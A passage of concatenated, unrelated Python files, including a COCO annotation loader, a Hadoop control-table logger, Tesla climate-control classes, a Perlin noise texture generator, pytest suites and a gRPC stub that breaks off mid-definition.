ann_spec['category_id'] in cat_list and ann_spec['iscrowd'] == 0: img_bboxes.append([ann_spec['bbox'], cat_translate_dict[ann_spec['category_id']]]) ann_count_per_cat[cat_translate_dict[ann_spec['category_id']]] += 1 return img_bboxes, ann_count_per_cat def get_image_file_location(self, img_spec): """ Returns image file location :param img_spec: coco image specification :return: image file location """ return self.coco_image_folder + img_spec['file_name'] def get_category_labeled_images(self, cat_nested_list, verbose=True, print_func=print): """ This function forms the actual interface and output of the class, providing the coco data via a standardized and simple format. Returns a list with [image_file_locations, ...] a list with labels [[bounding boxes, bbox category], ...] 
and a dictionary linking the category names to their id's. The images contain all the categories specified in the 'cat_nested_list' parameter. :param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image. :param verbose: print when True, a description of the selected data. :param print_func: contains a function to print 'verbose' information with. Is the print function by default. :return: a list with image file locations, a list with corresponding labels in format [[[x,y,width,height], bbox_category_id], ...], [[x,y,width,height], bbox_category_id], ...], ...] and a dictionary linking the category names to their id's. example: get_category_labeled_images([['person'], ['car', 'bicycle', 'dog']] ,verbose=False) returns images with at least a person in it AND images with at least a car AND a bicycle AND a dog. labels for each category are added to each image, so a image images with at least a car AND a bicycle AND a dog might also contain labels of persons. """ img_spec_list, cat_list = self.get_images_ids(cat_nested_list) cat_dict, cat_translate_dict = self.build_category_dict(cat_list) # load images and annotations x_data = [] y_data = [] total_ann_count = np.array([0] * len(cat_list)) for img_spec in img_spec_list: image_file = self.get_image_file_location(img_spec) image_bboxes, img_ann_count = self.load_image_annotations(img_spec, cat_translate_dict, cat_list) total_ann_count += img_ann_count x_data.append(image_file) y_data.append(image_bboxes) # display data details if verbose: print_func("Categories selected: {}".format(cat_dict)) print_func("Total images: {}".format(len(img_spec_list))) for cat_id, cat_ann_count in zip(range(len(total_ann_count)), total_ann_count): print_func("Annotations in \"{}\": {}".format(cat_dict[cat_id], cat_ann_count)) return x_data, y_data, cat_dict def get_image_sizes(self, cat_nested_list): """ Returns a list of image sizes in pixels. If the same value for the 'cat_nested_list' parameter is used as with the 'get_category_labeled_images' method, will the returned sizes match the data_x and data_y result lists of the get_category_labeled_images method. So: img_size_list[i] belongs to data_x[i] and data_y[i] :param cat_nested_list: is a list of lists, each inner list describing the items which has to be in the image. :return: list of image sizes in format [[width, height], ...] """ img_size_list = [] img_spec_list, cat_list = self.get_images_ids(cat_nested_list) for img_spec in img_spec_list: img_size_list.append([img_spec['width'], img_spec['height']]) return img_size_list
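# Illustrative helper (an addition, not part of the original interface): many
# detection frameworks want corner coordinates rather than the COCO
# [x, y, width, height] format returned above. The function name is made up.
def bbox_xywh_to_corners(bbox):
    """Convert a COCO-style [x, y, width, height] bbox to [x1, y1, x2, y2]."""
    x, y, w, h = bbox
    return [x, y, x + w, y + h]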
python
import os

# Use the dunder name so the list actually controls `from package import *`;
# a plain `all` would only shadow the built-in of the same name.
__all__ = [i[:-3] for i in os.listdir(os.path.dirname(__file__))
           if i.endswith(".py") and not i.startswith(".")]
python
import sys
from datetime import datetime

from datapipe.configuracoes import Configuracoes
from datapipe.converters.tabela_hadoop import TabelaHadoop
from datapipe.datasources.db2 import Db2
from datapipe.utils.constantes import YAML_CONTINUA_ERRO
from datapipe.utils.log import Log, Niveis


class TabelaControleException(Exception):
    pass


class TabelaControle:
    def __init__(self, config: Configuracoes, nome_pipeline: str, bigsql: Db2, tabela: TabelaHadoop):
        self.config = config
        self.nome_pipeline = nome_pipeline
        self.bigsql = bigsql
        self.tabela = tabela

    def registrar_erro(self, erro: Exception = None):
        if erro:
            self.tabela.mensagem_erro = str(erro)
            Log.logar(erro, Niveis.ERROR)
        self.salvar()
        if self.tabela.continuar_em_erro:
            Log.logar(
                f"Erro na {self.nome_pipeline} da tabela {self.tabela.nome}. Tempo decorrido {self.tabela.timer}.",
                Niveis.ERROR)
            return True
        else:
            raise TabelaControleException(f"Erro na {self.nome_pipeline} da tabela {self.tabela.nome}, processo FINALIZADO "
                                          f"conforme a flag '{YAML_CONTINUA_ERRO}'.")

    def iniciar(self):
        Log.logar(
            f"Iniciando {self.nome_pipeline} da tabela '{self.tabela.nome}'.", Niveis.INFO_DESTAQUE)
        self.tabela.inicializar_temporizador()
        self.bigsql.selecionar_schema(self.tabela.schema)

    def finalizar(self):
        if not self.tabela.mensagem_erro:
            self.salvar()
            registros = f"{int(self.tabela.qdte_registros):,}".replace(",", ".")
            Log.logar(
                f"{self.nome_pipeline} da tabela {self.tabela.nome} finalizado em {self.tabela.timer}. {registros} registros gerados.",
                Niveis.INFO_DESTAQUE)

    def salvar(self):
        valores = {}
        valores['JOB_CONFIG'] = self.config.nome_job
        valores['PIPELINE'] = self.nome_pipeline
        valores['DATA_PROC_CARGA'] = datetime.today().date()
        valores['TABELA_PROC'] = self.tabela.nome_com_schema
        valores['DATA_HORA_TABELA'] = datetime.today()
        valores['QTD_REGISTROS'] = self.tabela.qdte_registros
        if self.tabela.mensagem_erro:
            valores['ERRO_BASE'] = str(self.tabela.mensagem_erro)[:520]
        valores['TEMPO_TABELA'] = str(self.tabela.timer)
        valores['KB_TRANSFERIDO'] = self.tabela.kb_transferido

        schema = self.tabela.schema
        tabela_controle = self.config.tabela_controle
        try:
            if "." in tabela_controle:
                schema, tabela_controle = tabela_controle.split(".")
            # TODO: check how many physical files the configured control table has;
            # do this at application start-up, when configuring/zipping the log.
            # > What to do: recreate the control table with insert/from to reduce the number of files.
            self.bigsql.salvar_registro(
                tabela_controle, valores, schema=schema)
        except Exception:
            _, mensagem, _ = sys.exc_info()
            if any(erro for erro in ['SQL0204N', 'SQL0206N'] if erro in str(mensagem)):
                self.__reconfigurar_tabela_controle(
                    tabela_controle, schema, valores, mensagem)
            else:
                raise TabelaControleException(mensagem)

    def __reconfigurar_tabela_controle(self, tabela_controle, schema, valores, mensagem_erro):
        DDL_VERSAO_04 = {'JOB_CONFIG': 'VARCHAR(100)',
                         'PIPELINE': 'VARCHAR(100)',
                         'DATA_PROC_CARGA': 'DATE',
                         'TABELA_PROC': 'VARCHAR(255)',
                         'DATA_HORA_TABELA': 'TIMESTAMP',
                         'TEMPO_TABELA': 'VARCHAR(10)',
                         'QTD_REGISTROS': 'INTEGER',
                         'KB_TRANSFERIDO': 'VARCHAR(30)',
                         'ERRO_BASE': 'VARCHAR(520)'}
        try:
            if 'SQL0204N' in str(mensagem_erro):
                if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema):
                    self.bigsql.salvar_registro(
                        tabela_controle, valores, schema=schema)
            if 'SQL0206N' in str(mensagem_erro):
                tabela_controle_backup = f'{tabela_controle}_VERSAO_03'
                self.bigsql.renomear_tabela(
                    nome_antigo=tabela_controle, nome_novo=tabela_controle_backup, schema=schema)
                if self.bigsql.criar_tabela(tabela_controle, DDL_VERSAO_04, schema=schema):
                    self.bigsql.executar_script(self.__carregar_migracao(
                        tabela_controle_backup, tabela_controle, schema))
                    self.bigsql.salvar_registro(
                        tabela_controle, valores, schema=schema)
                else:
                    # TODO: table creation failed; rename back so the existing data is not lost
                    self.bigsql.renomear_tabela(
                        nome_antigo=tabela_controle_backup, nome_novo=tabela_controle, schema=schema)
        except Exception as ex:
            raise TabelaControleException(ex)

    def __carregar_migracao(self, nome_origem, nome_destino, schema):
        script_versao04 = f"INSERT INTO {schema}.{nome_destino} " \
            f"SELECT NULL AS JOB_CONFIG, NULL AS PIPELINE, DATA_PROC_CARGA, " \
            f"TABELA_PROC, DATA_HORA_TABELA, TEMPO_TABELA, QTD_REGISTROS, " \
            f"KB_TRANSFERIDO, ERRO_BASE " \
            f"FROM {schema}.{nome_origem}"
        return script_versao04
python
import inspect from enum import Enum from typing import Callable, cast, TypeVar from .._internal.default_container import get_default_container from ..core import DependencyContainer from ..providers import IndirectProvider T = TypeVar('T', bound=type) def implements(interface: type, *, state: Enum = None, container: DependencyContainer = None) -> Callable[[T], T]: """ Class decorator declaring the underlying class as a (possible) implementation to be used by Antidote when requested the specified interface. For now, the underlying class needs to be decorated with @register. Args: interface: Interface implemented by the decorated class. state: If multiple implementations exist for an interface, an :py:class:`~enum.Enum` should be used to identify all the possible states the application may be. Each state should be associated with one implementation. At runtime Antidote will retrieve the state (the :py:class:`~enum.Enum`) class to determine the current state. container: :py:class:`~.core.container.DependencyContainer` from which the dependencies should be retrieved. Defaults to the global container if it is defined. Returns: The decorated class, unmodified. """ container = container or get_default_container() def register_implementation(cls): if not inspect.isclass(cls): raise TypeError("implements must be applied on a class, " "not a {}".format(type(cls))) if not issubclass(cls, interface): raise TypeError("{} does not implement {}.".format(cls, interface)) interface_provider = cast(IndirectProvider, container.providers[IndirectProvider]) interface_provider.register(interface, cls, state) return cls return register_implementation
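# Usage sketch (illustrative): linking an implementation to its interface.
# The class names are hypothetical, and @register is assumed to come from the
# same antidote package, as the docstring above requires.
#
#   from antidote import register, implements
#
#   class IDatabase:
#       pass
#
#   @implements(IDatabase)
#   @register
#   class PostgresDatabase(IDatabase):
#       pass
#
# Requesting IDatabase from the container then resolves to PostgresDatabase.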
python
# Numpy exercises - 32
# *******************
import numpy as np

print(np.sqrt(16))
print(np.emath.sqrt(-16))  # complex numbers: emath returns 4j instead of nan
python
#  SPDX-License-Identifier: Apache-2.0
"""
Python Package for controlling Tesla API.

For more details about this api, please refer to the documentation at
https://github.com/zabuldon/teslajsonpy
"""
import time
from typing import Text

from teslajsonpy.vehicle import VehicleDevice


class Climate(VehicleDevice):
    """Home-assistant class of HVAC for Tesla vehicles.

    This is intended to be partially inherited by a Home-Assistant entity.
    """

    def __init__(self, data, controller):
        """Initialize the environmental controls.

        Vehicles have both a driver and passenger.

        Parameters
        ----------
        data : dict
            The base state for a Tesla vehicle.
            https://tesla-api.timdorr.com/vehicle/state/data
        controller : teslajsonpy.Controller
            The controller that controls updates to the Tesla API.

        Returns
        -------
        None

        """
        super().__init__(data, controller)
        self.__is_auto_conditioning_on = False
        self.__inside_temp = 0
        self.__outside_temp = 0
        self.__driver_temp_setting = 0
        self.__passenger_temp_setting = 0
        self.__is_climate_on = False
        self.__fan_status = 0
        self.__manual_update_time = 0

        self.type = "HVAC (climate) system"
        self.hass_type = "climate"
        self.measurement = "C"

        self.name = self._name()
        self.uniq_name = self._uniq_name()
        self.bin_type = 0x3

    def is_hvac_enabled(self):
        """Return whether HVAC is running."""
        return self.__is_climate_on

    def get_current_temp(self):
        """Return vehicle inside temperature."""
        return self.__inside_temp

    def get_goal_temp(self):
        """Return driver set temperature."""
        return self.__driver_temp_setting

    def get_fan_status(self):
        """Return fan status."""
        return self.__fan_status

    async def async_update(self):
        """Update the HVAC state."""
        await super().async_update()
        data = self._controller.get_climate_params(self._id)
        if data:
            last_update = self._controller.get_last_update_time(self._id)
            if last_update >= self.__manual_update_time:
                self.__is_auto_conditioning_on = data["is_auto_conditioning_on"]
                self.__is_climate_on = data["is_climate_on"]
                # compare against None so a legitimate reading of 0 is kept
                self.__driver_temp_setting = (
                    data["driver_temp_setting"]
                    if data["driver_temp_setting"] is not None
                    else self.__driver_temp_setting
                )
                self.__passenger_temp_setting = (
                    data["passenger_temp_setting"]
                    if data["passenger_temp_setting"] is not None
                    else self.__passenger_temp_setting
                )
            self.__inside_temp = (
                data["inside_temp"] if data["inside_temp"] is not None else self.__inside_temp
            )
            self.__outside_temp = (
                data["outside_temp"] if data["outside_temp"] is not None else self.__outside_temp
            )
            self.__fan_status = data["fan_status"]

    async def set_temperature(self, temp):
        """Set both the driver and passenger temperature to temp."""
        temp = round(temp, 1)
        self.__manual_update_time = time.time()
        data = await self._controller.command(
            self._id,
            "set_temps",
            {"driver_temp": temp, "passenger_temp": temp},
            wake_if_asleep=True,
        )
        if data and data["response"]["result"]:
            self.__driver_temp_setting = temp
            self.__passenger_temp_setting = temp

    async def set_status(self, enabled):
        """Enable or disable the HVAC."""
        self.__manual_update_time = time.time()
        if enabled:
            data = await self._controller.command(
                self._id, "auto_conditioning_start", wake_if_asleep=True
            )
            if data and data["response"]["result"]:
                self.__is_auto_conditioning_on = True
                self.__is_climate_on = True
        else:
            data = await self._controller.command(
                self._id, "auto_conditioning_stop", wake_if_asleep=True
            )
            if data and data["response"]["result"]:
                self.__is_auto_conditioning_on = False
                self.__is_climate_on = False
        await self.async_update()

    @staticmethod
    def has_battery():
        """Return whether the device has a battery."""
        return False


class TempSensor(VehicleDevice):
    """Home-assistant class of temperature sensors for Tesla vehicles.

    This is intended to be partially inherited by a Home-Assistant entity.
    """

    def __init__(self, data, controller):
        """Initialize the temperature sensors and track in celsius.

        Vehicles have both a driver and passenger.

        Parameters
        ----------
        data : dict
            The base state for a Tesla vehicle.
            https://tesla-api.timdorr.com/vehicle/state/data
        controller : teslajsonpy.Controller
            The controller that controls updates to the Tesla API.

        Returns
        -------
        None

        """
        super().__init__(data, controller)
        self.__inside_temp = 0
        self.__outside_temp = 0

        self.type = "temperature sensor"
        self.measurement = "C"
        self.hass_type = "sensor"
        self._device_class: Text = "temperature"
        self.name = self._name()
        self.uniq_name = self._uniq_name()
        self.bin_type = 0x4

    def get_inside_temp(self):
        """Get inside temperature."""
        return self.__inside_temp

    def get_outside_temp(self):
        """Get outside temperature."""
        return self.__outside_temp

    async def async_update(self):
        """Update the temperature."""
        await super().async_update()
        data = self._controller.get_climate_params(self._id)
        if data:
            self.__inside_temp = (
                data["inside_temp"] if data["inside_temp"] is not None else self.__inside_temp
            )
            self.__outside_temp = (
                data["outside_temp"] if data["outside_temp"] is not None else self.__outside_temp
            )

    @staticmethod
    def has_battery():
        """Return whether the device has a battery."""
        return False

    @property
    def device_class(self) -> Text:
        """Return the HA device class."""
        return self._device_class
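# Usage sketch (hypothetical wiring): both classes are driven by a
# teslajsonpy.Controller. Given an authenticated `controller` and the raw
# vehicle `data` dict from the API (names assumed), preconditioning the cabin
# could look roughly like this:
#
#   import asyncio
#
#   async def precondition(data, controller):
#       climate = Climate(data, controller)
#       await climate.set_status(True)         # start auto conditioning
#       await climate.set_temperature(21.5)    # driver + passenger setpoint
#       return climate.get_current_temp()
#
#   asyncio.run(precondition(vehicle_data, controller))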
python
# -*- coding: utf-8 -*-
import math
import random


class NoiseUtils:
    # NOTE: `canshu` is pinyin for "parameter"; the identifiers are kept as-is.
    def __init__(self, imageLen, imageWid):
        self.imageLen = imageLen
        self.imageWid = imageWid
        self.gradientNumber = 256

        self.grid = [[]]
        self.gradients = []
        self.permutations = []
        self.img = {}

        self.__generateGradientVectors()
        self.__normalizeGradientVectors()
        self.__generatePermutationsTable()

    def __generateGradientVectors(self):
        for i in range(self.gradientNumber):
            while True:
                x, y = random.uniform(-1, 1), random.uniform(-1, 1)
                if x * x + y * y < 1:
                    self.gradients.append([x, y])
                    break

    def __normalizeGradientVectors(self):
        for i in range(self.gradientNumber):
            x, y = self.gradients[i][0], self.gradients[i][1]
            length = math.sqrt(x * x + y * y)
            self.gradients[i] = [x / length, y / length]

    # The modern version of the Fisher-Yates shuffle
    def __generatePermutationsTable(self):
        self.permutations = [i for i in range(self.gradientNumber)]
        for i in reversed(range(self.gradientNumber)):
            j = random.randint(0, i)
            self.permutations[i], self.permutations[j] = \
                self.permutations[j], self.permutations[i]

    def getGradientIndex(self, x, y):
        return self.permutations[(x + self.permutations[y % self.gradientNumber]) % self.gradientNumber]

    def perlinNoise(self, x, y):
        qx0 = int(math.floor(x))
        qx1 = qx0 + 1

        qy0 = int(math.floor(y))
        qy1 = qy0 + 1

        q00 = self.getGradientIndex(qx0, qy0)
        q01 = self.getGradientIndex(qx1, qy0)
        q10 = self.getGradientIndex(qx0, qy1)
        q11 = self.getGradientIndex(qx1, qy1)

        tx0 = x - math.floor(x)
        tx1 = tx0 - 1

        ty0 = y - math.floor(y)
        ty1 = ty0 - 1

        v00 = self.gradients[q00][0] * tx0 + self.gradients[q00][1] * ty0
        v01 = self.gradients[q01][0] * tx1 + self.gradients[q01][1] * ty0
        v10 = self.gradients[q10][0] * tx0 + self.gradients[q10][1] * ty1
        v11 = self.gradients[q11][0] * tx1 + self.gradients[q11][1] * ty1

        wx = tx0 * tx0 * (3 - 2 * tx0)
        v0 = v00 + wx * (v01 - v00)
        v1 = v10 + wx * (v11 - v10)

        wy = ty0 * ty0 * (3 - 2 * ty0)
        return (v0 + wy * (v1 - v0)) * 0.5 + 1

    def makeTexture(self, canshu1, canshu2, canshu3, texture=None):
        if texture is None:
            # NOTE: no `cloud` method is defined in this class; pass an explicit
            # texture function (e.g. self.wood) to avoid an AttributeError here.
            texture = self.cloud

        noise = {}
        max = min = None
        for i in range(self.imageLen):
            for j in range(self.imageWid):
                value = texture(i, j, canshu1, canshu2, canshu3, noise=None)
                noise[i, j] = value

                if max is None or max < value:
                    max = value

                if min is None or min > value:
                    min = value

        for i in range(self.imageLen):
            for j in range(self.imageWid):
                self.img[i, j] = int((noise[i, j] - min) / (max - min) * 255)

    def fractalBrownianMotion(self, x, y, func, octaves, persistence, canshu):
        # octaves = 12
        amplitude = 1.0
        frequency = 1.0 / self.imageWid
        # persistence = 0.5
        value = 0.0

        for k in range(octaves):
            value += func(x * frequency, y * frequency) * amplitude
            frequency *= canshu
            amplitude *= persistence

        return value

    def wood(self, x, y, canshu1, canshu2, canshu3, noise=None):
        if noise is None:
            noise = self.perlinNoise

        frequency = 1.0 / self.imageWid
        n = noise(canshu1 * x * frequency, canshu2 * y * frequency) * canshu3
        return n - int(n)
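# Usage sketch: rendering a small wood texture. The parameter values are
# illustrative only; after makeTexture runs, `img` maps (x, y) -> 0..255.
if __name__ == '__main__':
    gen = NoiseUtils(128, 128)
    gen.makeTexture(1, 1, 30, texture=gen.wood)
    print(gen.img[64, 64])  # normalized grey level of the centre pixel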
python
VERSION = '0.1.7'
python
# -*- coding: utf-8 -*- from __future__ import print_function from io import StringIO from dktemplate.parse import nest from dktemplate.tokenize import tokenize class Render(object): def __init__(self, content): self.content = content self.out = StringIO() self.curlevel = 0 def value(self): return self.out.getvalue() def render(self, item=None): if item is None: item = self.content[0] tag = item[0] if tag.startswith('block:'): tag = 'block' #print '[I]', item, 'CALLING:', getattr(self, 'render_' + tag).__name__ , item try: getattr(self, 'render_' + tag)(item) except: print('='*80) print(self.out.getvalue()) raise def render_block(self, block): print("{%% %s %%}" % block[0], file=self.out) if len(block) > 1: for item in block[1]: self.render(item) print("{%% end%s %%}" % block[0], file=self.out) def render_tag(self, tag): print("{%% %s %%}" % (' '.join(tag[1:])), file=self.out) def render_val(self, item): print("{{ %s }}" % item[1], file=self.out) def render(txt, fname=None): item = [nest(tokenize(txt), fname)] r = Render("") r.render(item) return r.value()
python
def findDuplicate(string):
    duplicates = []  # avoid shadowing the built-in `list`
    for ch in string:
        if ch not in duplicates and string.count(ch) > 1:
            duplicates.append(ch)
    return duplicates


n = input('Enter String : ')
print('Duplicate characters :', findDuplicate(n))
python
# Copyright 2020 Tyler Calder
import collections
import contextlib
import io
import unittest.mock
import os
import subprocess
import sys

import pytest
from pytest_mock import mocker

sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import _realreq.realreq as realreq

CONTENT = """
import os
import requests
from foo import bar
from . import local_module
import local_module2
from foo.baz import frum
import abbrev
import src.local_module
"""

MOCK_ALIASES = {"abbrev": "abbreviation"}
realreq.ALIASES = MOCK_ALIASES

_MOCK_DEPENDENCY_TREE = {
    "foo": ["bar"],
    "requests": ["baz", "spam"],
    "baz": [],
    "spam": ["egg", "wheel"],
    "egg": ["pip"],
    "pip": [],
    "wheel": [],
    "abbreviation": [],
}

_MOCK_DEP_VERSIONS = {
    "foo": "1.0.0",
    "baz": "0.1.0",
    "spam": "3.2.12",
    "egg": "13.0",
    "pip": "2.12.1",
    "wheel": "1.1.1",
    "notused": "201.10.1",
    "DevDep": "0.1.1",
    "testDep": "0.1.3",
    "abbreviation": "1.2.1",
    "requests": "0.2.0",
}

_DEEP_DEPENDENCIES = collections.OrderedDict(
    [
        ("abbreviation", "1.2.1"),
        ("baz", "0.1.0"),
        ("egg", "13.0"),
        ("foo", "1.0.0"),
        ("pip", "2.12.1"),
        ("requests", "0.2.0"),
        ("spam", "3.2.12"),
        ("wheel", "1.1.1"),
    ]
)

_SHALLOW_DEPENDENCIES = collections.OrderedDict(
    [
        ("abbreviation", "1.2.1"),
        ("foo", "1.0.0"),
        ("requests", "0.2.0"),
    ]
)


def mock_pip_show(*args, **kwargs):
    pkg = args[0][2]
    try:
        deps = _MOCK_DEPENDENCY_TREE[pkg]
    except KeyError:
        raise subprocess.CalledProcessError(1, cmd="Test Command")
    mock_result = unittest.mock.MagicMock()
    mock_result.configure_mock(
        **{
            "stdout": "stuff\nRequires: {0}\nmore stuff".format(
                ", ".join(deps)
            ).encode()
        }
    )
    return mock_result


def mock_pip_freeze(*args, **kwargs):
    result = b"\n".join(
        ["{0}=={1}".format(k, v).encode() for k, v in _MOCK_DEP_VERSIONS.items()]
    )
    mock_result = unittest.mock.MagicMock()
    mock_result.configure_mock(**{"stdout": result})
    return mock_result


def mock_subprocess_run(*args, **kwargs):
    """Mock calls to subprocess by routing them to the right mock"""
    command = args[0][1]
    if command == "show":
        return mock_pip_show(*args, **kwargs)
    elif command == "freeze":
        return mock_pip_freeze(*args, **kwargs)


@pytest.fixture(scope="session", params=["src", "path/to/src"])
def source_files(
    tmp_path_factory,
    request,
):
    """Creates a temp directory that tests different source files

    returns: path to directory being used for test
    """
    path = os.path.normpath(request.param)
    paths = path.split("/")
    if len(paths) > 1:
        # create the base directory, then nest the remaining components
        # (this used to index `path[0]`, i.e. the first *character* of the path)
        src = tmp_path_factory.mktemp(paths[0], numbered=False)
        for p in paths[1:]:
            src = src / p
            src.mkdir()
    else:
        src = tmp_path_factory.mktemp(path, numbered=False)
    main = src / "main.py"
    main.write_text(CONTENT)
    return src


def test_search_source_for_used_packages(source_files):
    """Source code is searched and acquires the name of all packages used"""
    pkgs = realreq._search_source(str(source_files))
    expected = [
        "requests",
        "foo",
        "local_module2",
        "abbreviation",
    ]
    assert set(pkgs) == set(expected)


def test_build_dependency_list(mocker):
    """Dependency tree build-out should identify all the dependencies a module has"""
    # Essentially we want to make sure that the values returned from the system
    # are what we would get by running `pip show x`, and then getting the "Requires" value
    mock_run = mocker.patch("subprocess.run")
    mock_run.side_effect = mock_pip_show

    pkgs = ["requests", "foo", "local_module2", "abbreviation"]
    dep_tree = realreq._build_dep_list(pkgs)
    assert all([_ in dep_tree for _ in list(_MOCK_DEPENDENCY_TREE.keys())])


def test_get_dependency_versions(mocker):
    """Dependency versions should return a dictionary with packages and versions"""
    mock_run = mocker.patch("subprocess.run")
    mock_run.side_effect = mock_pip_freeze

    pkgs = _MOCK_DEPENDENCY_TREE.keys()
    versions = realreq._get_dependency_versions(pkgs)
    assert versions == {
        "foo": "1.0.0",
        "baz": "0.1.0",
        "spam": "3.2.12",
        "egg": "13.0",
        "pip": "2.12.1",
        "wheel": "1.1.1",
        "abbreviation": "1.2.1",
        "requests": "0.2.0",
    }


class TestCLI:
    """Tests for the CLI of realreq"""

    @pytest.mark.parametrize("s_flag", ["-s", "--source"])
    def test_default_flags(self, source_files, mocker, s_flag):
        args = ["cmd", s_flag, str(source_files)]
        mocker.patch.object(sys, "argv", args)
        mock_run = mocker.patch("subprocess.run")
        mock_run.side_effect = mock_subprocess_run

        sbuff = io.StringIO()
        with contextlib.redirect_stdout(sbuff):
            app = realreq._RealReq()
            app()
        sbuff.seek(0)
        assert sbuff.read() == "".join(
            "{0}=={1}\n".format(k, v) for k, v in _SHALLOW_DEPENDENCIES.items()
        )

    @pytest.mark.parametrize("s_flag", ["-s", "--source"])
    @pytest.mark.parametrize("d_flag", ["-d", "--deep"])
    def test_deep_flag(self, source_files, mocker, s_flag, d_flag):
        args = ["cmd", s_flag, str(source_files), d_flag]
        mocker.patch.object(sys, "argv", args)
        mock_run = mocker.patch("subprocess.run")
        mock_run.side_effect = mock_subprocess_run

        sbuff = io.StringIO()
        with contextlib.redirect_stdout(sbuff):
            app = realreq._RealReq()
            app()
        sbuff.seek(0)
        assert sbuff.read() == "".join(
            "{0}=={1}\n".format(k, v) for k, v in _DEEP_DEPENDENCIES.items()
        )
python
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
'''
@Description: utility helpers
@Author: Zpp
@Date: 2019-10-28 11:28:09
LastEditors: Zpp
LastEditTime: 2020-11-24 16:27:50
'''
import platform


def IsWindows():
    return True if platform.system() == 'Windows' else False


def ReadFile(path, type='r'):
    try:
        f = open(path, type)
        content = f.read()
        f.close()
        return content
    except Exception:
        return False


def WriteFile(path, content, type='w'):
    try:
        f = open(path, type)
        f.write(content)
        f.close()
        return True
    except Exception:
        return False


def health_database_status(s, sql):
    is_db = True
    try:
        s.execute(sql)
    except Exception:
        is_db = False
    return is_db
python
# -*- coding: utf-8 -*- import pytest import time import zwutils.dlso as dlso # pylint: disable=no-member def test_dict2obj(): r = dlso.dict2obj({ 'ks': 'v1', 'kn': 2, 'ka': [1, '2'], 'kd': {'1':1, '2':2}, 'knone': None }) r2 = dlso.dict2obj(None) assert r.ks == 'v1' def test_obj2dict(): o = type('', (), {})() o.a1 = 'a' o.a2 = 'b' r = dlso.obj2dict(o) assert r['a1'] == 'a' def test_extend_attr(): b = {'a':'a', 'b':'b'} e = {'b':'bb', 'c':'c', 'd':1} o = dlso.extend_attrs(dlso.dict2obj(b), e) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(b, e) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(dlso.dict2obj(b), dlso.dict2obj(e)) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(None, e) assert o.b == 'bb' and o.c == 'c' and o.d == 1 o = dlso.extend_attrs(dlso.dict2obj(b), None) assert o.a == 'a' and o.b == 'b' def test_update_attrs(): b = {'a':'a', 'b':'b'} e = {'b':'bb', 'c':'c'} o = dlso.update_attrs(dlso.dict2obj(b), e) assert o.b == 'bb' and not hasattr(o, 'c') o = dlso.update_attrs(b, e) assert o.b == 'bb' and not hasattr(o, 'c') o = dlso.update_attrs(dlso.dict2obj(b), dlso.dict2obj(e)) assert o.b == 'bb' and not hasattr(o, 'c') o = dlso.update_attrs(None, e) assert not hasattr(o, 'b') and not hasattr(o, 'c') o = dlso.update_attrs(dlso.dict2obj(b), None) assert o.a == 'a' and o.b == 'b' def test_upsert_config(): pcfg = type('', (), {})() pcfg.a = 'o' dcfg = {'a': 'd', 'da':'da', 'n1':{'nn1': {'nnn1': 'nnn1'}, 'nn2': 'nn2' } } ncfg = {'a': 'n', 'na':'na'} pmcfg = {'a': 'p','pa':'pa'} cfg = dlso.upsert_config(pcfg, dcfg, ncfg, pmcfg) assert id(cfg) == id(pcfg) and cfg.a == 'p' and hasattr(cfg, 'pa') and cfg.n1.nn1.nnn1 == 'nnn1' def test_list_split(): r = dlso.list_split(list(range(11)), 3) assert len(r) == 3 r = dlso.list_split(list(range(5)), 6) assert len(r) == 5 def test_list_compare(): assert False == dlso.list_compare([1,2,3,3], [1,2,2,3]) assert True == dlso.list_compare([1,2,3], [2,1,3])
python
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! import grpc import environment.grpc.jobshop_pb2 as jobshop__pb2 class EnvironmentStub(object): """Missing associated documentation comment in .proto file""" def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.ApplyAction = channel.unary_unary( '/env.Environment/ApplyAction', request_serializer=jobshop__pb2.MasAction.SerializeToString, response_deserializer=jobshop__pb2.MasActionResponse.FromString, ) self.Reset = channel.unary_unary( '/env.Environment/Reset', request_serializer=jobshop__pb2.Empty.SerializeToString, response_deserializer=jobshop__pb2.MasState.FromString, ) self.Render = channel.unary_unary( '/env.Environment/Render', request_serializer=jobshop__pb2.Empty.SerializeToString, response_deserializer=jobshop__pb2.Empty.FromString, ) self.SetSeed = channel.unary_unary( '/env.Environment/SetSeed', request_serializer=jobshop__pb2.Seed.SerializeToString, response_deserializer=jobshop__pb2.Empty.FromString, ) self.Setup = channel.unary_unary( '/env.Environment/Setup', request_serializer=jobshop__pb2.SettingsMsg.SerializeToString, response_deserializer=jobshop__pb2.SetupMsg.FromString, ) class EnvironmentServicer(object): """Missing associated documentation comment in .proto file""" def ApplyAction(self, request, context): """Apply an action to all agents """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def Reset(self, request, context): """Reset the environment """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def Render(self, request, context): """Show GUI """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def SetSeed(self, request, context): """Set the env seed """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def Setup(self, request, context): """Set and get Settings """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_EnvironmentServicer_to_server(servicer, server): rpc_method_handlers = { 'ApplyAction': grpc.unary_unary_rpc_method_handler( servicer.ApplyAction, request_deserializer=jobshop__pb2.MasAction.FromString, response_serializer=jobshop__pb2.MasActionResponse.SerializeToString, ), 'Reset': grpc.unary_unary_rpc_method_handler( servicer.Reset, request_deserializer=jobshop__pb2.Empty.FromString, response_serializer=jobshop__pb2.MasState.SerializeToString, ), 'Render': grpc.unary_unary_rpc_method_handler( servicer.Render, request_deserializer=jobshop__pb2.Empty.FromString, response_serializer=jobshop__pb2.Empty.SerializeToString, ), 'SetSeed': grpc.unary_unary_rpc_method_handler( servicer.SetSeed, request_deserializer=jobshop__pb2.Seed.FromString, 